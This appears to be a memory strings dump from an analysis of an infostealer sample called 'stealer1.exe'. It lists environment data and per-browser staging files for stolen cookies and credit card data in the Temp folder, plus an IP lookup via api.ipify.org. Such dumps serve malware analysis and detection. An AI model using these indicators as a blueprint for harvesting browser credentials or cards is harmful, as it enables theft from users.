  462. 0x35f397 (22): v1.3.6.1.4.1.311.21.11
  463. 0x35f3cf (22): v1.3.6.1.4.1.311.21.12
  464. 0x35f407 (21): v1.3.6.1.4.1.311.21.7
  465. 0x35f43f (22): v1.3.6.1.4.1.311.21.14
  466. 0x35f477 (23): v1.3.6.1.4.1.311.10.9.1
  467. 0x35f4af (24): v1.2.840.113549.1.12.1.1
  468. 0x35f4e7 (24): v1.2.840.113549.1.12.1.2
  469. 0x35f51f (24): v1.2.840.113549.1.12.1.3
  470. 0x35f557 (24): v1.2.840.113549.1.12.1.4
  471. 0x35f58f (24): v1.2.840.113549.1.12.1.5
  472. 0x35f5c7 (24): v1.2.840.113549.1.12.1.6
  473. 0x35f5ff (21): v1.2.840.113549.1.1.1
  474. 0x35f637 (18): v1.2.840.10040.4.1
  475. 0x35f66f (21): v1.2.840.113549.1.1.1
  476. 0x35f6a7 (18): v1.2.840.10040.4.1
  477. 0x35f6df (18): v1.3.6.1.5.5.7.2.2
  478. 0x35f717 (18): v1.3.6.1.5.5.7.1.1
  479. 0x35f74f (19): v1.3.6.1.5.5.7.1.11
  480. 0x35f787 (23): v1.3.6.1.4.1.311.2.1.14
  481. 0x35f7bf (22): v1.2.840.113549.1.9.14
  482. 0x35f7f7 (21): v1.3.6.1.4.1.311.10.2
  483. 0x35fa07 (7): vMemory
  484. 0x35fa2f (7): vSystem
  485. 0x35fa7f (6): vPKCS7
  486. 0x35faa7 (7): vPKCS12
  487. 0x36004f (10): v2.5.29.28
  488. 0x36007f (10): v2.5.29.30
  489. 0x3600af (10): v2.5.29.33
  490. 0x3600df (10): v2.5.29.36
  491. 0x36010f (11): vSerialized
  492. 0x36013f (11): vCollection
  493. 0x36016f (15): vSystemRegistry
  494. 0x36019f (9): vPhysical
  495. 0x3601cf (14): v1.3.14.3.2.26
  496. 0x3601ff (14): v1.3.14.3.2.12
  497. 0x36022f (14): v1.3.14.3.2.12
  498. 0x3602bf (9): v2.5.29.1
  499. 0x3602ef (9): v2.5.29.2
  500. 0x36031f (9): v2.5.29.4
  501. 0x36034f (9): v2.5.29.7
  502. 0x36037f (9): v2.5.29.8
  503. 0x3603af (10): v2.5.29.10
  504. 0x3603df (10): v2.5.29.15
  505. 0x36040f (10): v2.5.29.19
  506. 0x36043f (10): v2.5.29.32
  507. 0x36046f (10): v2.5.29.35
  508. 0x36049f (10): v2.5.29.14
  509. 0x3604cf (10): v2.5.29.17
  510. 0x3604ff (10): v2.5.29.18
  511. 0x36052f (10): v2.5.29.21
  512. 0x36055f (10): v2.5.29.31
  513. 0x36058f (10): v2.5.29.37
  514. 0x3605bf (10): v2.5.29.20
  515. 0x3605ef (10): v2.5.29.27
  516. 0x36061f (10): v2.5.29.28
  517. 0x36064f (10): v2.5.29.46
  518. 0x36067f (10): v2.5.29.30
  519. 0x3606af (10): v2.5.29.33
  520. 0x3606df (9): v2.5.29.5
  521. 0x36070f (10): v2.5.29.36
  522. 0x36073f (10): v2.5.29.54
  523. 0x36076f (9): v2.5.29.1
  524. 0x36079f (9): v2.5.29.2
  525. 0x3607cf (9): v2.5.29.4
  526. 0x3607ff (9): v2.5.29.7
  527. 0x360a27 (21): v1.3.6.1.4.1.311.10.1
  528. 0x360a5f (19): v1.2.840.113549.3.2
  529. 0x360a97 (22): v1.2.840.113549.1.9.15
  530. 0x360acf (18): v1.3.6.1.5.5.7.1.3
  531. 0x360b07 (21): v1.2.840.113549.1.9.5
  532. 0x360b3f (23): v1.3.6.1.4.1.311.13.2.1
  533. 0x360b77 (23): v1.3.6.1.4.1.311.13.2.2
  534. 0x360baf (23): v1.3.6.1.4.1.311.10.9.1
  535. 0x360be7 (21): v1.3.6.1.4.1.311.21.7
  536. 0x360c1f (21): v1.3.6.1.5.5.7.48.1.1
  537. 0x360c57 (19): v1.3.6.1.5.5.7.1.12
  538. 0x360c8f (18): v1.3.6.1.5.5.7.1.2
  539. 0x360cc7 (18): v1.2.840.10045.4.3
  540. 0x360cff (18): v1.2.840.10045.2.1
  541. 0x360d37 (22): v1.2.840.113549.1.1.10
  542. 0x360d6f (21): v1.2.840.113549.1.1.7
  543. 0x360ddf (18): v1.3.6.1.5.5.7.2.2
  544. 0x360e17 (18): v1.3.6.1.5.5.7.1.1
  545. 0x360e4f (19): v1.3.6.1.5.5.7.1.11
  546. 0x360e87 (23): v1.3.6.1.4.1.311.2.1.14
  547. 0x360ebf (22): v1.2.840.113549.1.9.14
  548. 0x360ef7 (21): v1.3.6.1.4.1.311.10.2
  549. 0x360f2f (21): v1.3.6.1.4.1.311.10.1
  550. 0x360f67 (19): v1.2.840.113549.3.2
  551. 0x360f9f (22): v1.2.840.113549.1.9.15
  552. 0x360fd7 (18): v1.3.6.1.5.5.7.1.3
  553. 0x36100f (21): v1.2.840.113549.1.9.5
  554. 0x361047 (23): v1.3.6.1.4.1.311.13.2.1
  555. 0x36107f (23): v1.3.6.1.4.1.311.13.2.2
  556. 0x3610b7 (23): v1.3.6.1.4.1.311.10.9.1
  557. 0x3610ef (21): v1.3.6.1.4.1.311.21.7
  558. 0x361127 (21): v1.3.6.1.5.5.7.48.1.1
  559. 0x36115f (19): v1.3.6.1.5.5.7.1.12
  560. 0x361197 (18): v1.3.6.1.5.5.7.1.2
  561. 0x3611cf (18): v1.2.840.10045.4.3
  562. 0x36139f (9): v2.5.29.8
  563. 0x3613cf (10): v2.5.29.10
  564. 0x3613ff (10): v2.5.29.15
  565. 0x36142f (10): v2.5.29.19
  566. 0x36145f (10): v2.5.29.32
  567. 0x36148f (9): v2.5.29.3
  568. 0x3614bf (10): v2.5.29.35
  569. 0x3614ef (10): v2.5.29.14
  570. 0x36151f (10): v2.5.29.17
  571. 0x36154f (10): v2.5.29.18
  572. 0x36157f (10): v2.5.29.21
  573. 0x3615af (10): v2.5.29.31
  574. 0x3615df (10): v2.5.29.37
  575. 0x36160f (10): v2.5.29.20
  576. 0x36163f (10): v2.5.29.27
  577. 0x36166f (10): v2.5.29.28
  578. 0x36169f (10): v2.5.29.46
  579. 0x3616cf (10): v2.5.29.30
  580. 0x3616ff (10): v2.5.29.33
  581. 0x36172f (9): v2.5.29.5
  582. 0x36175f (10): v2.5.29.36
  583. 0x36178f (10): v2.5.29.54
  584. 0x36181f (13): v1.3.14.3.2.7
  585. 0x36184f (13): v1.3.14.3.2.7
  586. 0x361b87 (26): v2.16.840.1.113733.1.7.1.1
  587. 0x361bc7 (25): v1.3.6.1.4.1.311.10.11.85
  588. 0x361c1f (18): v1.2.840.10045.2.1
  589. 0x361c57 (22): v1.2.840.113549.1.1.10
  590. 0x361c8f (21): v1.2.840.113549.1.1.7
  591. 0x361cff (19): v1.2.840.113549.3.7
  592. 0x361d37 (19): v1.2.840.113549.3.2
  593. 0x361d6f (19): v1.2.840.113549.3.4
  594. 0x361da7 (21): v1.2.840.113549.1.1.1
  595. 0x361ddf (19): v1.2.840.113549.3.7
  596. 0x361e17 (19): v1.2.840.113549.3.2
  597. 0x361e4f (19): v1.2.840.113549.3.4
  598. 0x361ec8 (10): USERNAME=A
  599. 0x361f50 (36): C:\Users\A\Desktop
  600. 0x361ff8 (40): C:\Users\A\Documents
  601. 0x3620a0 (44): C:\Program Files (x86)
  602. 0x3621f0 (44): Microsoft Unified Security Protocol Provider
  603. 0x362228 (44): PKU2U Security Package
  604. 0x362298 (46): LRPC-710cd034e2444564be
  605. 0x3622d0 (46): Microsoft Kerberos V1.0
  606. 0x362308 (42): NTLM Security Package
  607. 0x362418 (35): CertDllVerifyCertificateChainPolicy
  608. 0x362470 (34): CryptMsgDllCNGGenContentEncryptKey
  609. 0x3624c8 (37): CryptMsgDllCNGImportContentEncryptKey
  610. 0x362a0d (6): r,t8*6
  611. 0x362a34 (7): r,t`*6
  612. 0x362afd (6): r,t(+6
  613. 0x362b25 (6): r,tP+6
  614. 0x362b4d (6): r,tx+6
  615. 0x362c14 (7): @s,th,6
  616. 0x362c38 (31): C:\Users\A\Desktop\stealer1.exe
  617. 0x362df0 (222): C:\Windows\WinSxS\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\
  618. 0x362ed8 (246): C:\Windows\WinSxS\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll
  619. 0x363008 (142): C:\Program Files (x86)\IEInspector\HTTPAnalyzerFullV7\HookWinSockV7.dll
  620. 0x363130 (15): Winsta0\Default
  621. 0x363190 (14): AppData
  622. 0x3631a8 (14): Desktop
  623. 0x3631c0 (14): Desktop
  624. 0x3640ee (26): =C:\Program F
  625. 0x3641aa (26):
  626. 0x364228 (24):
  627. 0x364241 (8):
  628. 0x36428a (26): abcdefghijklmnopqrstuvwxyz
  629. 0x3642aa (26): ABCDEFGHIJKLMNOPQRSTUVWXYZ
  630. 0x364388 (31): C:\Users\A\Desktop\stealer1.exe
  631. 0x3643d8 (14): COMPUTERNAME=O
  632. 0x3643f8 (104): C:\Windows\system32\api-ms-win-core-synch-l1-2-0.DLL
  633. 0x365ad8 (30): AppData\Roaming
  634. 0x365b00 (26): Local AppData
  635. 0x365b28 (26): AppData\Local
  636. 0x365b50 (24): ProgramFiles
  637. 0x365b78 (30): ProgramFilesX86
  638. 0x365de0 (54): CommonProgramFiles=C:\Program Files (x86)\Common Files
  639. 0x365e48 (59): CommonProgramFiles(x86)=C:\Program Files (x86)\Common Files
  640. 0x365eb0 (48): CommonProgramW6432=C:\Program Files\Common Files
  641. 0x365f10 (19): FP_NO_HOST_CHECK=NO
  642. 0x365f50 (12): HOMEDRIVE=C:
  643. 0x365f90 (17): HOMEPATH=\Users\A
  644. 0x365fd0 (37): LOCALAPPDATA=C:\Users\A\AppData\Local
  645. 0x366028 (15): LOGONSERVER=\\O
  646. 0x366068 (69): MpConfig_ProductAppDataPath=C:\ProgramData\Microsoft\Windows Defender
  647. 0x3660e0 (36): MpConfig_ProductCodeName=AntiSpyware
  648. 0x366138 (54): MpConfig_ProductPath=C:\Program Files\Windows Defender
  649. 0x3661a0 (59): MpConfig_ReportingGUID=8C765C2A-C3FC-4C7B-ABC6-72E8D7028CEB
  650. 0x366208 (13): OS=Windows_NT
  651. 0x366248 (161): Path=C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\
  652. 0x366318 (61): PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC
  653. 0x366388 (72): PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 158 Stepping 9, GenuineIntel
  654. 0x366400 (17): PROCESSOR_LEVEL=6
  655. 0x366440 (40): ProgramFiles(x86)=C:\Program Files (x86)
  656. 0x366498 (64): PSModulePath=C:\Windows\system32\WindowsPowerShell\v1.0\Modules\
  657. 0x366508 (19): SESSIONNAME=Console
  658. 0x366548 (14): SystemDrive=C:
  659. 0x366588 (12): USERDOMAIN=O
  660. 0x3665c8 (17): windir=C:\Windows
  661. 0x366608 (69): windows_tracing_logfile=C:\BVTBin\Tests\installpackage\csilogfile.log
  662. 0x366ea2 (106): 6\Device\HarddiskVolume2\Users\A\Desktop\stealer1.exe
  663. 0x3675d0 (82): @%SystemRoot%\system32\shell32.dll,-21769
  664. 0x367630 (78): %SystemRoot%\system32\imageres.dll,-183
  665. 0x3676a8 (16): Personal
  666. 0x3676c8 (18): Documents
  667. 0x3676e8 (158): ::{59031a47-3f72-44a7-89c5-5595fe6b30ee}\{FDD39AD0-238F-46AF-ADB4-6C85480369C7}
  668. 0x367790 (82): @%SystemRoot%\system32\shell32.dll,-21770
  669. 0x3677f0 (78): %SystemRoot%\system32\imageres.dll,-112
  670. 0x3678e0 (14): COMPUTERNAME=O
  671. 0x3679a0 (13): OS=Windows_NT
  672. 0x3679e0 (17): PROCESSOR_LEVEL=6
  673. 0x367a20 (19): SESSIONNAME=Console
  674. 0x367b60 (17): HOMEPATH=\Users\A
  675. 0x367be0 (12): USERDOMAIN=O
  676. 0x367c20 (12): HOMEDRIVE=C:
  677. 0x367d00 (50): Schannel Security Package
  678. 0x367d40 (50): Schannel Security Package
  679. 0x367e20 (15): LOGONSERVER=\\O
  680. 0x367ee0 (19): FP_NO_HOST_CHECK=NO
  681. 0x367f80 (54): TS Service Security Package
  682. 0x367fe0 (14): SystemDrive=C:
  683. 0x368660 (17): windir=C:\Windows
  684. 0x368868 (82): @%SystemRoot%\system32\shell32.dll,-21781
  685. 0x3688e8 (82): @%SystemRoot%\system32\shell32.dll,-21817
  686. 0x368dc0 (38): C:\Windows\rescache
  687. 0x368ee0 (34): protected_storage
  688. 0x368fd0 (33): Digest Authentication for Windows
  689. 0x3690a2 (14): 6GSSAPI
  690. 0x3698b4 (20): sr-Latn-CS
  691. 0x369906 (16): qps-ploc
  692. 0x369918 (18): qps-plocm
  693. 0x36995c (16): 52C64B7E
  694. 0x36a216 (30): tzres.dll,-212
  695. 0x36a256 (42): Pacific Standard Time
  696. 0x36a296 (30): @tzres.dll,-211
  697. 0x36a2d6 (42): Pacific Daylight Time
  698. 0x36a3f8 (38): C:\Users\A\AppData\Local\Temp\body.out
  699. 0x36a7b8 (49): C:\Users\A\AppData\Local\Temp\Sputnik_Cookies.txt
  700. 0x36a9e0 (49): C:\Users\A\AppData\Local\Temp\Sputnik_Cookies.txt
  701. 0x36ac08 (49): C:\Users\A\AppData\Local\Temp\Sputnik_Cookies.txt
  702. 0x36ae30 (46): C:\Users\A\AppData\Local\Temp\Epic_Cookies.txt
  703. 0x36b058 (46): C:\Users\A\AppData\Local\Temp\Epic_Cookies.txt
  704. 0x36b280 (46): C:\Users\A\AppData\Local\Temp\Epic_Cookies.txt
  705. 0x36b4a8 (46): C:\Users\A\AppData\Local\Temp\Epic_Cookies.txt
  706. 0x36b6d0 (48): C:\Users\A\AppData\Local\Temp\CocCoc_Cookies.txt
  707. 0x36b8f8 (48): C:\Users\A\AppData\Local\Temp\CocCoc_Cookies.txt
  708. 0x36bb20 (48): C:\Users\A\AppData\Local\Temp\CocCoc_Cookies.txt
  709. 0x36bd48 (48): C:\Users\A\AppData\Local\Temp\CocCoc_Cookies.txt
  710. 0x36bf70 (48): C:\Users\A\AppData\Local\Temp\GOOGLE_Cookies.txt
  711. 0x36c198 (48): C:\Users\A\AppData\Local\Temp\GOOGLE_Cookies.txt
  712. 0x36c3c0 (48): C:\Users\A\AppData\Local\Temp\GOOGLE_Cookies.txt
  713. 0x36c5e8 (48): C:\Users\A\AppData\Local\Temp\GOOGLE_Cookies.txt
  714. 0x36c810 (47): C:\Users\A\AppData\Local\Temp\Amigo_Cookies.txt
  715. 0x36ca38 (47): C:\Users\A\AppData\Local\Temp\Amigo_Cookies.txt
  716. 0x36cc60 (47): C:\Users\A\AppData\Local\Temp\Amigo_Cookies.txt
  717. 0x36ce88 (47): C:\Users\A\AppData\Local\Temp\Amigo_Cookies.txt
  718. 0x36d0b0 (42): C:\Users\A\AppData\Local\Temp\Amigo_CC.txt
  719. 0x36d2d8 (43): C:\Users\A\AppData\Local\Temp\GOOGLE_CC.txt
  720. 0x36d500 (44): C:\Users\A\AppData\Local\Temp\Vivaldi_CC.txt
  721. 0x36d728 (44): C:\Users\A\AppData\Local\Temp\Vivaldi_CC.txt
  722. 0x36d950 (44): C:\Users\A\AppData\Local\Temp\Vivaldi_CC.txt
  723. 0x36db78 (44): C:\Users\A\AppData\Local\Temp\Vivaldi_CC.txt
  724. 0x36dda0 (43): C:\Users\A\AppData\Local\Temp\Yandex_CC.txt
  725. 0x36dfc8 (43): C:\Users\A\AppData\Local\Temp\Yandex_CC.txt
  726. 0x36e1f0 (43): C:\Users\A\AppData\Local\Temp\Yandex_CC.txt
  727. 0x36e418 (43): C:\Users\A\AppData\Local\Temp\Yandex_CC.txt
  728. 0x36e9ae (54): 9ppData\Local\Google\Chrome
  729. 0x36ed20 (59): MpConfig_ReportingGUID=8C765C2A-C3FC-4C7B-ABC6-72E8D7028CEB
  730. 0x36ed88 (61): PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC
  731. 0x36ee38 (192): PATH=C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Users\A\AppData\Local\Temp\
  732. 0x36ef28 (192): PATH=C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Users\A\AppData\Local\Temp\
  733. 0x36fe06 (78): 8sers\A\AppData\Local\Temp\MSVCP140.dll
  734. 0x36fe56 (24): MSVCP140.dll
  735. 0x36fe70 (26): \MSVCP140.dll
  736. 0x36fef0 (64): PSModulePath=C:\Windows\system32\WindowsPowerShell\v1.0\Modules\
  737. 0x3707c0 (43): C:\Users\A\AppData\Local\Temp\Kometa_CC.txt
  738. 0x3709e8 (43): C:\Users\A\AppData\Local\Temp\Kometa_CC.txt
  739. 0x370c10 (43): C:\Users\A\AppData\Local\Temp\Kometa_CC.txt
  740. 0x370e38 (43): C:\Users\A\AppData\Local\Temp\Kometa_CC.txt
  741. 0x371060 (44): C:\Users\A\AppData\Local\Temp\Orbitum_CC.txt
  742. 0x371288 (44): C:\Users\A\AppData\Local\Temp\Orbitum_CC.txt
  743. 0x3714b0 (44): C:\Users\A\AppData\Local\Temp\Orbitum_CC.txt
  744. 0x3716d8 (44): C:\Users\A\AppData\Local\Temp\Orbitum_CC.txt
  745. 0x371900 (43): C:\Users\A\AppData\Local\Temp\Comodo_CC.txt
  746. 0x371b28 (43): C:\Users\A\AppData\Local\Temp\Comodo_CC.txt
  747. 0x371d50 (43): C:\Users\A\AppData\Local\Temp\Comodo_CC.txt
  748. 0x371f78 (43): C:\Users\A\AppData\Local\Temp\Comodo_CC.txt
  749. 0x3721a0 (42): C:\Users\A\AppData\Local\Temp\Torch_CC.txt
  750. 0x3723c8 (42): C:\Users\A\AppData\Local\Temp\Torch_CC.txt
  751. 0x3725f0 (42): C:\Users\A\AppData\Local\Temp\Torch_CC.txt
  752. 0x372818 (42): C:\Users\A\AppData\Local\Temp\Torch_CC.txt
  753. 0x372a40 (42): C:\Users\A\AppData\Local\Temp\Opera_CC.txt
  754. 0x372c68 (43): C:\Users\A\AppData\Local\Temp\MailRu_CC.txt
  755. 0x372e90 (43): C:\Users\A\AppData\Local\Temp\MailRu_CC.txt
  756. 0x3730b8 (43): C:\Users\A\AppData\Local\Temp\MailRu_CC.txt
  757. 0x3732e0 (43): C:\Users\A\AppData\Local\Temp\MailRu_CC.txt
  758. 0x373508 (44): C:\Users\A\AppData\Local\Temp\rambler_CC.txt
  759. 0x373730 (44): C:\Users\A\AppData\Local\Temp\rambler_CC.txt
  760. 0x373958 (44): C:\Users\A\AppData\Local\Temp\rambler_CC.txt
  761. 0x373b80 (44): C:\Users\A\AppData\Local\Temp\rambler_CC.txt
  762. 0x373da8 (45): C:\Users\A\AppData\Local\Temp\Chromium_CC.txt
  763. 0x373fd0 (45): C:\Users\A\AppData\Local\Temp\Chromium_CC.txt
  764. 0x3741f8 (45): C:\Users\A\AppData\Local\Temp\Chromium_CC.txt
  765. 0x374420 (45): C:\Users\A\AppData\Local\Temp\Chromium_CC.txt
  766. 0x3747c0 (45): C:\Users\A\AppData\Local\Temp\Maxthon5_CC.txt
  767. 0x3749e8 (44): C:\Users\A\AppData\Local\Temp\Sputnik_CC.txt
  768. 0x374c10 (44): C:\Users\A\AppData\Local\Temp\Sputnik_CC.txt
  769. 0x374e38 (44): C:\Users\A\AppData\Local\Temp\Sputnik_CC.txt
  770. 0x375060 (44): C:\Users\A\AppData\Local\Temp\Sputnik_CC.txt
  771. 0x375288 (41): C:\Users\A\AppData\Local\Temp\Epic_CC.txt
  772. 0x3754b0 (41): C:\Users\A\AppData\Local\Temp\Epic_CC.txt
  773. 0x3756d8 (41): C:\Users\A\AppData\Local\Temp\Epic_CC.txt
  774. 0x375900 (41): C:\Users\A\AppData\Local\Temp\Epic_CC.txt
  775. 0x375b28 (43): C:\Users\A\AppData\Local\Temp\CocCoc_CC.txt
  776. 0x375d50 (43): C:\Users\A\AppData\Local\Temp\CocCoc_CC.txt
  777. 0x375f78 (43): C:\Users\A\AppData\Local\Temp\CocCoc_CC.txt
  778. 0x3761a0 (43): C:\Users\A\AppData\Local\Temp\CocCoc_CC.txt
  779. 0x3763c8 (43): C:\Users\A\AppData\Local\Temp\GOOGLE_CC.txt
  780. 0x3765f0 (43): C:\Users\A\AppData\Local\Temp\GOOGLE_CC.txt
  781. 0x376818 (43): C:\Users\A\AppData\Local\Temp\GOOGLE_CC.txt
  782. 0x376a40 (43): C:\Users\A\AppData\Local\Temp\GOOGLE_CC.txt
  783. 0x376c68 (42): C:\Users\A\AppData\Local\Temp\Amigo_CC.txt
  784. 0x376e90 (42): C:\Users\A\AppData\Local\Temp\Amigo_CC.txt
  785. 0x3770b8 (42): C:\Users\A\AppData\Local\Temp\Amigo_CC.txt
  786. 0x3772e0 (42): C:\Users\A\AppData\Local\Temp\Amigo_CC.txt
  787. 0x3774f4 (514): C:\Users\A\Desktop;C:\Windows\system32;C:\Windows\system;C:\Windows;.;C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Users\A\AppData\Local\Temp\
  788. 0x37a868 (48): CommonProgramW6432=C:\Program Files\Common Files
  789. 0x37a8a8 (82): C:\Users\A\AppData\Local\Temp\mozglue.dll
  790. 0x37cf14 (30): dows\system32\_
  791. 0x37d068 (7): WDigest
  792. 0x37d6a0 (11): cryptsp.dll
  793. 0x37d730 (12): NegoExtender
  794. 0x37d760 (9): Negotiate
  795. 0x37d778 (14): ncalrpc
  796. 0x37d790 (8): Kerberos
  797. 0x37d7c0 (8): Schannel
  798. 0x37d7d8 (14): WDigest
  799. 0x37d850 (14): CREDSSP
  800. 0x37da20 (22): DNSResolver
  801. 0x37da80 (16): epmapper
  802. 0x37daa0 (17): SystemFunction035
  803. 0x37dae0 (20): lsasspirpc
  804. 0x37db00 (20): lsasspirpc
  805. 0x37db20 (18): Negotiate
  806. 0x37db40 (16): Kerberos
  807. 0x37db60 (23): Microsoft Kerberos V1.0
  808. 0x37db80 (21): NTLM Security Package
  809. 0x37dba0 (16): Schannel
  810. 0x37dbc0 (22): PKU2U Security Package
  811. 0x37dc20 (20): rogin Data
  812. 0x37e570 (28): Microsoft Package Negotiator
  813. 0x37e8b8 (24): NegoExtender
  814. 0x37e8e0 (29): NegoExtender Security Package
  815. 0x37e908 (25): Schannel Security Package
  816. 0x37e958 (25): Schannel Security Package
  817. 0x37e9d0 (27): TS Service Security Package
  818. 0x37e9fa (18): DVAPI32.d
  819. 0x37f268 (88): Microsoft Unified Security Protocol Provider
  820. 0x37f6bc (26): api.ipify.org
  821. 0x37f7b8 (21): COMODO CA Limited1604
  822. 0x37f7d3 (47): -COMODO RSA Domain Validation Secure Server CA0
  823. 0x37f804 (14):
  824. 180124000000Z
  825. 0x37f813 (19):
  826. 210123235959Z0X1!0
  827. 0x37f82e (25): Domain Control Validated1
  828. 0x37f851 (21): PositiveSSL Wildcard1
  829. 0x37f870 (12): *.ipify.org0
  830. 0x37fa50 (30): https://secure.comodo.com/CPS0
  831. 0x37fa89 (69): Chttp://crl.comodoca.com/COMODORSADomainValidationSecureServerCA.crl0
  832. 0x37faeb (70): Chttp://crt.comodoca.com/COMODORSADomainValidationSecureServerCA.crt0$
  833. 0x37fb3d (26): http://ocsp.comodoca.com0!
  834. 0x37fb62 (11): *.ipify.org
  835. 0x37fb6e (12): ipify.org0
  836.  
  837. 0x382fe8 (20): %pi.ipify.
  838. 0x383d0c (23): LRPC-710cd034e2444564be
  839. 0x385a30 (64): C:\Windows\SysWOW64\negoexts.DLL
  840. 0x385a80 (64): C:\Windows\SysWOW64\Kerberos.DLL
  841. 0x385ad0 (64): C:\Windows\SysWOW64\schannel.dll
  842. 0x385b20 (66): Digest Authentication for Windows
  843. 0x385b70 (62): C:\Windows\SysWOW64\wdigest.dll
  844. 0x385bc0 (70): Microsoft CredSSP Security Provider
  845. 0x385c10 (64): C:\Windows\SysWOW64\schannel.dll
  846. 0x385c80 (34): TEMP=C:\Users\A\AppData\Local\Temp
  847. 0x385cd0 (33): TMP=C:\Users\A\AppData\Local\Temp
  848. 0x387384 (22): cryptsp.dll
  849. 0x388c60 (32): @@HHPPXX``hhppxx
  850. 0x388d4e (50): 8 ((0088@@HHPPXX``hhppxx
  851. 0x388e4e (50): 8 ((0088@@HHPPXX``hhppxx
  852. 0x388f4e (50): 8 ((0088@@HHPPXX``hhppxx
  853. 0x38904e (50): 8 ((0088@@HHPPXX``hhppxx
  854. 0x38914e (50): 8 ((0088@@HHPPXX``hhppxx
  855. 0x38924e (50): 8 ((0088@@HHPPXX``hhppxx
  856. 0x38934e (50): 8 ((0088@@HHPPXX``hhppxx
  857. 0x38942e (20): 8 ((0088K
  858. 0x38a51e (42): 8bcryptprimitives.dll
  859. 0x38a552 (7): dationY
  860. 0x38a7f1 (48): Chttp://crl.comodoca.com/COMODORSADomainValidatA
  861. 0x38a828 (80): C:\Windows\SysWOW64\bcryptprimitives.dll
  862. 0x38a87a (7): nValid;
  863. 0x38a8cc (9): ipify.org
  864. 0x38a8d6 (12): ipify.org0
  865.  
  866. 0x38aa40 (19): Greater Manchester1
  867. 0x38aa5d (8): Salford1
  868. 0x38aa8c (34): OMODO RSA Certification Authority0
  869. 0x38aab0 (14):
  870. 140212000000Z
  871. 0x38aabf (15):
  872. 290211235959Z0
  873. 0x38ab05 (8): Salford1
  874. 0x38ab17 (21): COMODO CA Limited1604
  875. 0x38ab32 (26): -COMODO RSA Domain Validat
  876. 0x38ace8 (40): bcryptprimitives.dll
  877. 0x38ade0 (40): C:\Users\A\AppData\Local\Temp\GOOGLE.txt
  878. 0x38aff8 (54): CommonProgramFiles=C:\Program Files (x86)\Common Files
  879. 0x38b178 (39): C:\Users\A\AppData\Local\Temp\Amigo.txt
  880. 0x38b4d4 (20): ncrypt.dll
  881. 0x38b9b0 (10): USERNAME=A
  882. 0x38c8a8 (14): =::=::\
  883. 0x38c8b8 (60): ALLUSERSPROFILE=C:\ProgramData
  884. 0x38c8f6 (68): APPDATA=C:\Users\A\AppData\Roaming
  885. 0x38c93c (108): CommonProgramFiles=C:\Program Files (x86)\Common Files
  886. 0x38c9aa (118): CommonProgramFiles(x86)=C:\Program Files (x86)\Common Files
  887. 0x38ca22 (96): CommonProgramW6432=C:\Program Files\Common Files
  888. 0x38ca84 (28): COMPUTERNAME=O
  889. 0x38caa2 (70): ComSpec=C:\Windows\system32\cmd.exe
  890. 0x38caea (38): FP_NO_HOST_CHECK=NO
  891. 0x38cb12 (24): HOMEDRIVE=C:
  892. 0x38cb2c (34): HOMEPATH=\Users\A
  893. 0x38cb50 (74): LOCALAPPDATA=C:\Users\A\AppData\Local
  894. 0x38cb9c (30): LOGONSERVER=\\O
  895. 0x38cbbc (138): MpConfig_ProductAppDataPath=C:\ProgramData\Microsoft\Windows Defender
  896. 0x38cc48 (72): MpConfig_ProductCodeName=AntiSpyware
  897. 0x38cc92 (108): MpConfig_ProductPath=C:\Program Files\Windows Defender
  898. 0x38cd00 (166): MpConfig_ProductUserAppDataPath=C:\Users\A\AppData\Local\Microsoft\Windows Defender
  899. 0x38cda8 (118): MpConfig_ReportingGUID=8C765C2A-C3FC-4C7B-ABC6-72E8D7028CEB
  900. 0x38ce20 (44): NUMBER_OF_PROCESSORS=4
  901. 0x38ce4e (26): OS=Windows_NT
  902. 0x38ce6a (384): Path=C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Users\A\AppData\Local\Temp\
  903. 0x38cfec (122): PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC
  904. 0x38d068 (52): PROCESSOR_ARCHITECTURE=x86
  905. 0x38d09e (56): PROCESSOR_ARCHITEW6432=AMD64
  906. 0x38d0d8 (144): PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 158 Stepping 9, GenuineIntel
  907. 0x38d16a (34): PROCESSOR_LEVEL=6
  908. 0x38d18e (46): PROCESSOR_REVISION=9e09
  909. 0x38d1be (52): ProgramData=C:\ProgramData
  910. 0x38d1f4 (70): ProgramFiles=C:\Program Files (x86)
  911. 0x38d23c (80): ProgramFiles(x86)=C:\Program Files (x86)
  912. 0x38d28e (58): ProgramW6432=C:\Program Files
  913. 0x38d2ca (128): PSModulePath=C:\Windows\system32\WindowsPowerShell\v1.0\Modules\
  914. 0x38d34c (44): PUBLIC=C:\Users\Public
  915. 0x38d37a (38): SESSIONNAME=Console
  916. 0x38d3a2 (28): SystemDrive=C:
  917. 0x38d3c0 (42): SystemRoot=C:\Windows
  918. 0x38d3ec (68): TEMP=C:\Users\A\AppData\Local\Temp
  919. 0x38d432 (66): TMP=C:\Users\A\AppData\Local\Temp
  920. 0x38d476 (24): USERDOMAIN=O
  921. 0x38d490 (20): USERNAME=A
  922. 0x38d4a6 (44): USERPROFILE=C:\Users\A
  923. 0x38d4d4 (34): windir=C:\Windows
  924. 0x38d4f8 (46): windows_tracing_flags=3
  925. 0x38d528 (138): windows_tracing_logfile=C:\BVTBin\Tests\installpackage\csilogfile.log
